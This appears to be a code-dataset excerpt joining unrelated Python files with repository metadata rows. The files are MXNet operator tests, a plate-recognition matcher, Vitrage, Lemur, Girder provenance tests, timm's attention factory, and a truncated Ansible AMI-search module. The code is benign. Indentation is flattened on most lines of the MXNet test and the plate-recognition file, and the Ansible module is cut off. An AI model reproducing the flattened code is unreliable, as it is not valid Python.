negative_mining_thresh=0.4)
expected_loc_target = np.array([[5.0, 2.5000005, 3.4657357, 4.581454, 0., 0., 0., 0.]])
expected_loc_mask = np.array([[1, 1, 1, 1, 0, 0, 0, 0]])
expected_cls_target = np.array([[2, 0]])
assert_allclose(loc_target.asnumpy(), expected_loc_target, rtol=1e-5, atol=1e-5)
assert_array_equal(loc_mask.asnumpy(), expected_loc_mask)
assert_array_equal(cls_target.asnumpy(), expected_cls_target)
def test_gradient_multiplier_op():
    # We use the quadratic function in combination with gradient multiplier:
    # gradientmultiplier is an identity mapping on the forward pass and scales
    # the incoming gradient by `scalar` on the backward pass, so the expected
    # input gradient of f(x) = a * x**2 + b * x + c is (2 * a * x + b) * m.
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
m = np.random.random_sample() - 0.5
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
gr_q_sym = mx.sym.contrib.gradientmultiplier(quad_sym, scalar=m)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = (2 * a * data_np + b) * m
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
output = mx.nd.contrib.gradientmultiplier(output, scalar=m)
assert_almost_equal(output.asnumpy(), expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(gr_q_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(gr_q_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
def test_multibox_prior_op():
h = 561
w = 728
X = mx.nd.random.uniform(shape=(1, 3, h, w))
Y = mx.contrib.nd.MultiBoxPrior(X, sizes=[0.75, 0.5, 0.25], ratios=[1, 2, 0.5])
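    # 3 sizes and 3 ratios give (3 + 3 - 1) = 5 anchors per pixel, so
    # 561 * 728 * 5 = 2042040 corner-format boxes are expected.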
assert_array_equal(Y.shape, np.array((1, 2042040, 4)))
boxes = Y.reshape((h, w, 5, 4))
assert_allclose(boxes.asnumpy()[250, 250, 0, :], np.array([0.055117, 0.071524, 0.63307 , 0.821524]), atol=1e-5, rtol=1e-5)
# relax first ratio if user insists
Y = mx.contrib.nd.MultiBoxPrior(X, sizes=[0.75, 0.5, 0.25], ratios=[20, 2, 0.5])
boxes = Y.reshape((h, w, 5, 4))
assert_allclose(boxes.asnumpy()[250, 250, 0, :], np.array([-0.948249, 0.362671, 1.636436, 0.530377]), atol=1e-5, rtol=1e-5)
def test_box_encode_op():
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
refs = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
samples = mx.nd.array([[0, 1]])
matches = mx.nd.array([[0, 1]])
means = mx.nd.array([0.0, 0.0, 0.0, 0.0])
stds = mx.nd.array([0.1, 0.1, 0.2, 0.2])
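    # samples marks which anchors are treated as positive matches (here only
    # the second) and matches gives each anchor's matched reference index;
    # since the anchors equal their references, the encoded offsets are all
    # zero and only the sampled anchor is switched on in the mask.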
Y, mask = mx.nd.contrib.box_encode(samples, matches, anchors, refs, means, stds)
assert_allclose(Y.asnumpy(), np.zeros((1, 2, 4)), atol=1e-5, rtol=1e-5)
assert_allclose(mask.asnumpy(), np.array([[[0., 0., 0., 0.], [1., 1., 1., 1.]]]), atol=1e-5, rtol=1e-5)
def test_box_decode_op():
data = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
Y = mx.nd.contrib.box_decode(data, anchors, .1, .1, .2, .2)
assert_allclose(Y.asnumpy(), np.array([[[-0.0562755, -0.00865743, 0.26227552, 0.42465743], \
[0.13240421, 0.17859563, 0.93759584, 1.1174043 ]]]), atol=1e-5, rtol=1e-5)
@with_seed()
def test_op_mrcnn_mask_target():
if default_context().device_type != 'gpu':
return
num_rois = 2
num_classes = 4
mask_size = (3, 3)
ctx = mx.gpu(0)
# (B, N, 4)
rois = mx.nd.array([[[2.3, 4.3, 2.2, 3.3],
[3.5, 5.5, 0.9, 2.4]]], ctx=ctx)
gt_masks = mx.nd.arange(0, 4*32*32, ctx=ctx).reshape(1, 4, 32, 32)
# (B, N)
matches = mx.nd.array([[2, 0]], ctx=ctx)
# (B, N)
cls_targets = mx.nd.array([[2, 1]], ctx=ctx)
mask_targets, mask_cls = mx.nd.contrib.mrcnn_mask_target(rois, gt_masks, matches, cls_targets,
num_rois=num_rois,
num_classes=num_classes,
mask_size=mask_size)
# Ground truth outputs were generated with GluonCV's target generator
# gluoncv.model_zoo.mask_rcnn.MaskTargetGenerator(1, num_rois, num_classes, mask_size)
gt_mask_targets = mx.nd.array([[[[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]]],
[[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]]]]])
gt_mask_cls = mx.nd.array([[0,0,1,0], [0,1,0,0]])
gt_mask_cls = gt_mask_cls.reshape(1,2,4,1,1).broadcast_axes(axis=(3,4), size=(3,3))
assert_almost_equal(mask_targets.asnumpy(), gt_mask_targets.asnumpy())
assert_almost_equal(mask_cls.asnumpy(), gt_mask_cls.asnumpy())
if __name__ == '__main__':
import nose
nose.runmodule()
| mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/tests/python/unittest/test_contrib_operator.py | Python | apache-2.0 | 21,277 |
import sys
import cv2
import helper as hp
class MSP():
name = "MSP"
def __init__(self):
self.__patterns_num = []
self.__patterns_sym = []
self.__labels_num = []
self.__labels_sym = []
msp_num, msp_sym = "msp/num", "msp/sym"
self.__load_num_patterns(msp_num)
self.__load_sym_patterns(msp_sym)
        print 'MSP patterns loaded'
def __load_num_patterns(self, input_dir):
paths = hp.get_paths(input_dir)
self.__patterns_num = [hp.get_gray_image(input_dir, path) for path in paths]
self.__labels_num = [hp.get_test(path, "num")[0] for path in paths]
def __load_sym_patterns(self, input_dir):
paths = hp.get_paths(input_dir)
self.__patterns_sym = [hp.get_gray_image(input_dir, path) for path in paths]
self.__labels_sym = [hp.get_test(path, "sym")[0] for path in paths]
def __get_mode(self, mode):
if mode == "num":
return self.__labels_num, self.__patterns_num
elif mode == "sym":
return self.__labels_sym, self.__patterns_sym
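    # Recognition is nearest-template matching: the query image is compared
    # against every stored pattern and the label of the pattern that differs
    # in the fewest pixels is returned.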
    def rec(self, img, mode):
        best_diff, rec = sys.maxint, 0
        labels, patterns = self.__get_mode(mode)
        for pattern, label in zip(patterns, labels):
            diff = cv2.countNonZero(pattern - img)
            if diff < best_diff: best_diff, rec = diff, label
        return rec
| capital-boss/plate-recognition | msp.py | Python | apache-2.0 | 1,393 |
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
class AlarmsVitrage(horizon.Panel):
name = _("Alarms")
slug = "vitragealarms"
| openstack/vitrage-dashboard | vitrage_dashboard/alarms/panel.py | Python | apache-2.0 | 733 |
"""
.. module: lemur.authorizations.models
:platform: unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Netflix Secops <[email protected]>
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy_utils import JSONType
from lemur.database import db
from lemur.plugins.base import plugins
class Authorization(db.Model):
__tablename__ = "pending_dns_authorizations"
id = Column(Integer, primary_key=True, autoincrement=True)
account_number = Column(String(128))
domains = Column(JSONType)
dns_provider_type = Column(String(128))
options = Column(JSONType)
@property
def plugin(self):
return plugins.get(self.plugin_name)
def __repr__(self):
return "Authorization(id={id})".format(id=self.id)
def __init__(self, account_number, domains, dns_provider_type, options=None):
self.account_number = account_number
self.domains = domains
self.dns_provider_type = dns_provider_type
self.options = options
| Netflix/lemur | lemur/authorizations/models.py | Python | apache-2.0 | 1,090 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013, 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import json
from tests import base
from girder import events
from girder.constants import AccessType
from server import constants
def setUpModule():
base.enabledPlugins.append('provenance')
base.startServer()
def tearDownModule():
base.stopServer()
class ProvenanceTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
# Create some test documents with an item
admin = {
'email': '[email protected]',
'login': 'adminlogin',
'firstName': 'Admin',
'lastName': 'Last',
'password': 'adminpassword',
'admin': True
}
self.admin = self.model('user').createUser(**admin)
user = {
'email': '[email protected]',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = self.model('user').createUser(**user)
# Track folder, item, and setting provenance initially
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'folder,setting')
coll1 = {
'name': 'Test Collection',
'description': 'test coll',
'public': True,
'creator': self.admin
}
self.coll1 = self.model('collection').createCollection(**coll1)
folder1 = {
'parent': self.coll1,
'parentType': 'collection',
'name': 'Public test folder',
'creator': self.admin
}
self.folder1 = self.model('folder').createFolder(**folder1)
self.model('folder').setUserAccess(
self.folder1, self.user, level=AccessType.WRITE, save=False)
self.model('folder').setPublic(self.folder1, True, save=True)
item1 = {
'name': 'Public object',
'creator': self.admin,
'folder': self.folder1
}
self.item1 = self.model('item').createItem(**item1)
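    # _checkProvenance fetches (unless a response is supplied) and verifies the
    # latest provenance record of a resource: its version, acting user, event
    # type and, optionally, extra provenance fields and per-file details.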
def _checkProvenance(self, resp, item, version, user, eventType,
matches=None, fileInfo=None, resource='item'):
if resp is None:
resp = self._getProvenance(item, user, resource=resource)
self.assertStatusOk(resp)
itemProvenance = resp.json
self.assertEqual(itemProvenance['resourceId'], str(item['_id']))
provenance = itemProvenance['provenance']
self.assertEqual(provenance['eventType'], eventType)
self.assertEqual(provenance['version'], version)
self.assertEqual(str(provenance['eventUser']), str(user['_id']))
if matches:
for key in matches:
self.assertEqual(provenance[key], matches[key])
if fileInfo:
for key in fileInfo:
if isinstance(fileInfo[key], dict):
for subkey in fileInfo[key]:
self.assertEqual(provenance['file'][0][key][subkey],
fileInfo[key][subkey])
else:
self.assertEqual(provenance['file'][0][key], fileInfo[key])
def _getProvenance(self, item, user, version=None, resource='item',
checkOk=True):
params = {}
if version is not None:
params = {'version': version}
resp = self.request(
path='/%s/%s/provenance' % (resource, item['_id']),
method='GET', user=user, type='application/json', params=params)
if checkOk:
self.assertStatusOk(resp)
return resp
def _getProvenanceAfterMetadata(self, item, meta, user):
resp = self.request(path='/item/%s/metadata' % item['_id'],
method='PUT', user=user, body=json.dumps(meta),
type='application/json')
self.assertStatusOk(resp)
return self._getProvenance(item, user)
def testProvenanceItemMetadata(self):
"""
Test item provenance endpoint with metadata and basic changes
"""
item = self.item1
user = self.user
admin = self.admin
# check that the first version of the item exists
# ensure version 1, created by admin user, with creation event
self._checkProvenance(None, item, 1, admin, 'creation')
# update meta to {x:y}
metadata1 = {'x': 'y'}
resp = self._getProvenanceAfterMetadata(item, metadata1, admin)
# ensure version 2, updated by admin user, with update event, and meta
# in provenance matches
self._checkProvenance(resp, item, 2, admin, 'update',
{'new': {'meta': metadata1}})
# update meta to {} by regular user, we have to send in the key to
# remove it but check the saved metadata against {}
metadata2 = {'x': None}
resp = self._getProvenanceAfterMetadata(item, metadata2, user)
# ensure version 3, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 3, user, 'update',
{'old': {'meta': metadata1},
'new': {'meta': {}}})
# update meta to {x:y} by regular user
metadata3 = {'x': 'y'}
resp = self._getProvenanceAfterMetadata(item, metadata3, user)
# ensure version 4, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 4, user, 'update',
{'old': {'meta': {}},
'new': {'meta': metadata3}})
# update meta to {x:z} by regular user
metadata4 = {'x': 'z'}
resp = self._getProvenanceAfterMetadata(item, metadata4, user)
# ensure version 5, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 5, user, 'update',
{'old': {'meta': metadata3},
'new': {'meta': metadata4}})
# update meta to {x:z, q:u} by regular user
metadata5 = {'x': 'z', 'q': 'u'}
resp = self._getProvenanceAfterMetadata(item, metadata5, user)
# ensure version 6, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 6, user, 'update',
{'old': {'meta': metadata4},
'new': {'meta': metadata5}})
# update meta to {q:a} by regular user
metadata6 = {'x': None, 'q': 'a'}
resp = self._getProvenanceAfterMetadata(item, metadata6, user)
# ensure version 7, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 7, user, 'update',
{'old': {'meta': metadata5},
'new': {'meta': {'q': 'a'}}})
# Change the item name and description
params = {'name': 'Renamed object', 'description': 'New description'}
resp = self.request(path='/item/%s' % item['_id'], method='PUT',
user=admin, params=params)
self.assertStatusOk(resp)
params['lowerName'] = params['name'].lower()
self._checkProvenance(None, item, 8, admin, 'update', {'new': params})
# Copy the item and check that we marked it as copied
params = {'name': 'Copied object'}
resp = self.request(path='/item/%s/copy' % item['_id'],
method='POST', user=admin, params=params)
self.assertStatusOk(resp)
newItem = resp.json
self._checkProvenance(None, newItem, 9, admin, 'copy',
{'originalId': str(item['_id'])})
def testProvenanceItemFiles(self):
"""
Test item provenance when adding, modifying, and deleting files.
"""
item = self.item1
admin = self.admin
# Test adding a new file to an existing item
fileData1 = 'Hello world'
fileData2 = 'Hello world, again'
fileName1 = 'helloWorld.txt'
fileName2 = 'helloWorldEdit.txt'
resp = self.request(
path='/file', method='POST', user=admin, params={
'parentType': 'item',
'parentId': item['_id'],
'name': fileName1,
'size': len(fileData1),
'mimeType': 'text/plain'
})
self.assertStatusOk(resp)
uploadId = resp.json['_id']
fields = [('offset', 0), ('uploadId', uploadId)]
files = [('chunk', fileName1, fileData1)]
resp = self.multipartRequest(
path='/file/chunk', user=admin, fields=fields, files=files)
self.assertStatusOk(resp)
file1 = resp.json
self._checkProvenance(None, item, 2, admin, 'fileAdded',
fileInfo={'fileId': str(file1['_id']),
'new': {'mimeType': 'text/plain',
'size': len(fileData1),
'name': fileName1}})
# Edit the file name
resp = self.request(path='/file/%s' % file1['_id'], method='PUT',
user=admin, params={'name': fileName2})
self.assertStatusOk(resp)
self._checkProvenance(None, item, 3, admin, 'fileUpdate',
fileInfo={'fileId': str(file1['_id']),
'old': {'name': fileName1},
'new': {'name': fileName2}})
# Reupload the file
resp = self.request(path='/file/%s/contents' % file1['_id'],
method='PUT', user=admin,
params={'size': len(fileData2)})
self.assertStatusOk(resp)
uploadId = resp.json['_id']
fields = [('offset', 0), ('uploadId', uploadId)]
files = [('chunk', fileName1, fileData2)]
resp = self.multipartRequest(
path='/file/chunk', user=admin, fields=fields, files=files)
self.assertStatusOk(resp)
self.assertEqual(file1['_id'], resp.json['_id'])
self._checkProvenance(None, item, 4, admin, 'fileUpdate',
fileInfo={'fileId': str(file1['_id']),
'old': {'size': len(fileData1)},
'new': {'size': len(fileData2)}})
# Delete the file
resp = self.request(path='/file/%s' % file1['_id'],
method='DELETE', user=admin)
self.assertStatusOk(resp)
self._checkProvenance(None, item, 5, admin, 'fileRemoved',
fileInfo={'fileId': str(file1['_id']),
'old': {'size': len(fileData2),
'name': fileName2}})
def testProvenanceFolder(self):
"""
Test folder provenance, including turning off and on the provenance
handling of folders.
"""
folder1 = self.folder1
user = self.admin
# check that the first version of the folder provenance exists
self._checkProvenance(None, folder1, 1, user, 'creation',
resource='folder')
# Edit the folder and check again
params1 = {'name': 'Renamed folder', 'description': 'New description'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params1)
self.assertStatusOk(resp)
params1['lowerName'] = params1['name'].lower()
self._checkProvenance(None, folder1, 2, user, 'update',
{'new': params1}, resource='folder')
# Turn off folder provenance and make sure asking for it fails
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'setting')
resp = self._getProvenance(folder1, user, resource='folder',
checkOk=False)
self.assertStatus(resp, 400)
# While folder provenance is off, create a second folder and edit the
# first folder
params2 = {'name': 'Renamed Again', 'description': 'Description 2'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params2)
self.assertStatusOk(resp)
params2['lowerName'] = params2['name'].lower()
folder2 = {
'parent': self.coll1,
'parentType': 'collection',
'name': 'Private test folder',
'creator': self.admin
}
folder2 = self.model('folder').createFolder(**folder2)
# Turn back on folder provenance and check that it didn't record the
# changes we made.
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'folder,setting')
self._checkProvenance(None, folder1, 2, user, 'update',
{'new': params1}, resource='folder')
# Changing folder1 again should now show this change, and the old value
# should show the gap in the data
params3 = {'name': 'Renamed C', 'description': 'Description 3'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params3)
self.assertStatusOk(resp)
params3['lowerName'] = params3['name'].lower()
self._checkProvenance(None, folder1, 3, user, 'update',
{'old': params2, 'new': params3},
resource='folder')
# The new folder should have no provenance
resp = self._getProvenance(folder2, user, resource='folder')
self.assertEqual(resp.json['resourceId'], str(folder2['_id']))
self.assertIsNone(resp.json['provenance'])
# Edit the new folder; it should show the unknown history followed by
# the edit
params4 = {'description': 'Folder 2 Description'}
resp = self.request(path='/folder/%s' % folder2['_id'],
method='PUT', user=user, params=params4)
self.assertStatusOk(resp)
resp = self._getProvenance(folder2, user, 1, resource='folder')
self._checkProvenance(resp, folder2, 1, user, 'unknownHistory',
resource='folder')
self._checkProvenance(None, folder2, 2, user, 'update',
{'new': params4}, resource='folder')
# We should also see the initial history using negative indexing
resp = self._getProvenance(folder2, user, -2, resource='folder')
self._checkProvenance(resp, folder2, 1, user, 'unknownHistory',
resource='folder')
# We should be able to get the entire history using 'all'
resp = self._getProvenance(folder2, user, 'all', resource='folder')
self.assertEqual(resp.json['resourceId'], str(folder2['_id']))
self.assertEqual(len(resp.json['provenance']), 2)
self.assertEqual(resp.json['provenance'][0]['eventType'],
'unknownHistory')
self.assertEqual(resp.json['provenance'][1]['eventType'], 'update')
# We should get an error if we ask for a nonsense version
resp = self._getProvenance(folder2, user, 'not_a_version',
resource='folder', checkOk=False)
self.assertStatus(resp, 400)
def testProvenanceSetting(self):
        # After setting this resource list, only some of these models should
        # have provenance event handlers attached
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES,
'file,notification,unknown')
checkList = {
'item': True,
'file': True,
'notification': False,
'unknown': True}
for key in checkList:
eventName = 'model.%s.save' % key
self.assertTrue((eventName in events._mapping and 'provenance' in
[h['name'] for h in events._mapping[eventName]])
is checkList[key])
# Setting a blank should be okay. It should also remove all but item
# event mappings
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, '')
for key in checkList:
eventName = 'model.%s.save' % key
self.assertTrue((eventName in events._mapping and 'provenance' in
[h['name'] for h in events._mapping[eventName]])
is (key == 'item'))
| opadron/girder | plugins/provenance/plugin_tests/provenance_test.py | Python | apache-2.0 | 17,716 |
""" Attention Factory
Hacked together by / Copyright 2021 Ross Wightman
"""
import torch
from functools import partial
from .bottleneck_attn import BottleneckAttn
from .cbam import CbamModule, LightCbamModule
from .eca import EcaModule, CecaModule
from .gather_excite import GatherExcite
from .global_context import GlobalContext
from .halo_attn import HaloAttn
from .lambda_layer import LambdaLayer
from .non_local_attn import NonLocalAttn, BatNonLocalAttn
from .selective_kernel import SelectiveKernel
from .split_attn import SplitAttn
from .squeeze_excite import SEModule, EffectiveSEModule
def get_attn(attn_type):
if isinstance(attn_type, torch.nn.Module):
return attn_type
module_cls = None
if attn_type is not None:
if isinstance(attn_type, str):
attn_type = attn_type.lower()
# Lightweight attention modules (channel and/or coarse spatial).
# Typically added to existing network architecture blocks in addition to existing convolutions.
if attn_type == 'se':
module_cls = SEModule
elif attn_type == 'ese':
module_cls = EffectiveSEModule
elif attn_type == 'eca':
module_cls = EcaModule
elif attn_type == 'ecam':
module_cls = partial(EcaModule, use_mlp=True)
elif attn_type == 'ceca':
module_cls = CecaModule
elif attn_type == 'ge':
module_cls = GatherExcite
elif attn_type == 'gc':
module_cls = GlobalContext
elif attn_type == 'gca':
module_cls = partial(GlobalContext, fuse_add=True, fuse_scale=False)
elif attn_type == 'cbam':
module_cls = CbamModule
elif attn_type == 'lcbam':
module_cls = LightCbamModule
# Attention / attention-like modules w/ significant params
# Typically replace some of the existing workhorse convs in a network architecture.
# All of these accept a stride argument and can spatially downsample the input.
elif attn_type == 'sk':
module_cls = SelectiveKernel
elif attn_type == 'splat':
module_cls = SplitAttn
# Self-attention / attention-like modules w/ significant compute and/or params
# Typically replace some of the existing workhorse convs in a network architecture.
# All of these accept a stride argument and can spatially downsample the input.
elif attn_type == 'lambda':
return LambdaLayer
elif attn_type == 'bottleneck':
return BottleneckAttn
elif attn_type == 'halo':
return HaloAttn
elif attn_type == 'nl':
module_cls = NonLocalAttn
elif attn_type == 'bat':
module_cls = BatNonLocalAttn
# Woops!
else:
assert False, "Invalid attn module (%s)" % attn_type
elif isinstance(attn_type, bool):
if attn_type:
module_cls = SEModule
else:
module_cls = attn_type
return module_cls
def create_attn(attn_type, channels, **kwargs):
module_cls = get_attn(attn_type)
if module_cls is not None:
        # NOTE: it's expected the first (positional) argument of all attention layers is the input channels
return module_cls(channels, **kwargs)
return None
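# Example usage (illustrative sketch; assumes `x` is a 64-channel NCHW tensor):
#
#   attn = create_attn('se', 64)   # or 'eca', 'cbam', True/False, or an nn.Module
#   if attn is not None:
#       x = attn(x)                # drop-in addition after a conv block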
| rwightman/pytorch-image-models | timm/models/layers/create_attn.py | Python | apache-2.0 | 3,526 |
#!/usr/bin/env python2
#pylint: skip-file
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_ami_find
version_added: 2.0
short_description: Searches for AMIs to obtain the AMI ID and other information
description:
- Returns list of matching AMIs with AMI ID, along with other useful information
- Can search AMIs with different owners
- Can search by matching tag(s), by AMI name and/or other criteria
- Results can be sorted and sliced
author: Tom Bamford
notes:
- This module is not backwards compatible with the previous version of the ec2_search_ami module which worked only for Ubuntu AMIs listed on cloud-images.ubuntu.com.
- See the example below for a suggestion of how to search by distro/release.
options:
region:
description:
- The AWS region to use.
required: true
aliases: [ 'aws_region', 'ec2_region' ]
owner:
description:
- Search AMIs owned by the specified owner
- Can specify an AWS account ID, or one of the special IDs 'self', 'amazon' or 'aws-marketplace'
- If not specified, all EC2 AMIs in the specified region will be searched.
- You can include wildcards in many of the search options. An asterisk (*) matches zero or more characters, and a question mark (?) matches exactly one character. You can escape special characters using a backslash (\) before the character. For example, a value of \*amazon\?\\ searches for the literal string *amazon?\.
required: false
default: null
ami_id:
description:
- An AMI ID to match.
default: null
required: false
ami_tags:
description:
- A hash/dictionary of tags to match for the AMI.
default: null
required: false
architecture:
description:
- An architecture type to match (e.g. x86_64).
default: null
required: false
hypervisor:
description:
      - A hypervisor type to match (e.g. xen).
default: null
required: false
is_public:
description:
- Whether or not the image(s) are public.
choices: ['yes', 'no']
default: null
required: false
name:
description:
- An AMI name to match.
default: null
required: false
platform:
description:
- Platform type to match.
default: null
required: false
sort:
description:
      - Optional attribute with which to sort the results.
- If specifying 'tag', the 'tag_name' parameter is required.
choices: ['name', 'description', 'tag']
default: null
required: false
sort_tag:
description:
- Tag name with which to sort results.
- Required when specifying 'sort=tag'.
default: null
required: false
sort_order:
description:
- Order in which to sort results.
- Only used when the 'sort' parameter is specified.
choices: ['ascending', 'descending']
default: 'ascending'
required: false
sort_start:
description:
- Which result to start with (when sorting).
- Corresponds to Python slice notation.
default: null
required: false
sort_end:
description:
- Which result to end with (when sorting).
- Corresponds to Python slice notation.
default: null
required: false
state:
description:
- AMI state to match.
default: 'available'
required: false
virtualization_type:
description:
- Virtualization type to match (e.g. hvm).
default: null
required: false
no_result_action:
description:
- What to do when no results are found.
- "'success' reports success and returns an empty array"
- "'fail' causes the module to report failure"
choices: ['success', 'fail']
default: 'success'
required: false
requirements:
- boto
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Search for the AMI tagged "project:website"
- ec2_ami_find:
owner: self
    ami_tags:
project: website
no_result_action: fail
register: ami_find
# Search for the latest Ubuntu 14.04 AMI
- ec2_ami_find:
name: "ubuntu/images/ebs/ubuntu-trusty-14.04-amd64-server-*"
owner: 099720109477
sort: name
sort_order: descending
sort_end: 1
register: ami_find
# Launch an EC2 instance
- ec2:
    image: "{{ ami_find.results[0].ami_id }}"
    instance_type: m3.medium
key_name: mykey
wait: yes
'''
try:
import boto.ec2
HAS_BOTO=True
except ImportError:
HAS_BOTO=False
import json
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
region = dict(required=True,
aliases = ['aws_region', 'ec2_region']),
owner = dict(required=False, default=None),
ami_id = dict(required=False),
ami_tags = dict(required=False, type='dict',
aliases = ['search_tags', 'image_tags']),
architecture = dict(required=False),
hypervisor = dict(required=False),
is_public = dict(required=False),
name = dict(required=False),
platform = dict(required=False),
sort = dict(required=False, default=None,
choices=['name', 'description', 'tag']),
sort_tag = dict(required=False),
sort_order = dict(required=False, default='ascending',
choices=['ascending', 'descending']),
sort_start = dict(required=False),
sort_end = dict(required=False),
state = dict(required=False, default='available'),
virtualization_type = dict(required=False),
no_result_action = dict(required=False, default='success',
choices = ['success', 'fail']),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module, install via pip or your package manager')
ami_id = module.params.get('ami_id')
ami_tags = module.params.get('ami_tags')
architecture = module.params.get('architecture')
hypervisor = module.params.get('hypervisor')
is_public = module.params.get('is_public')
name = module.params.get('name')
owner = module.params.get('owner')
platform = module.params.get('platform')
sort = module.params.get('sort')
sort_tag = module.params.get('sort_tag')
sort_order = module.params.get('sort_order')
sort_start = module.params.get('sort_start')
sort_end = module.params.get('sort_end')
state = module.params.get('state')
virtualization_type = module.params.get('virtualization_type')
no_result_action = module.params.get('no_result_action')
filter = {'state': state}
if ami_id:
filter['image_id'] = ami_id
if ami_tags:
for tag in ami_tags:
filter['tag:'+tag] = ami_tags[tag]
if architecture:
filter['architecture'] = architecture
if hypervisor:
filter['hypervisor'] = hypervisor
if is_public:
filter['is_public'] = is_public
if name:
filter['name'] = name
if platform:
filter['platform'] = platform
if virtualization_type:
filter['virtualization_type'] = virtualization_type
ec2 = ec2_connect(module)
images_result = ec2.get_all_images(owners=owner, filters=filter)
if no_result_action == 'fail' and len(images_result) == 0:
module.fail_json(msg="No AMIs matched the attributes: %s" % json.dumps(filter))
results = []
for image in images_result:
data = {
'ami_id': image.id,
'architecture': image.architecture,
'description': image.description,
'is_public': image.is_public,
'name': image.name,
'owner_id': image.owner_id,
'platform': image.platform,
'root_device_name': image.root_device_name,
'root_device_type': image.root_device_type,
'state': image.state,
'tags': image.tags,
'virtualization_type': image.virtualization_type,
}
if image.kernel_id:
data['kernel_id'] = image.kernel_id
if image.ramdisk_id:
data['ramdisk_id'] = image.ramdisk_id
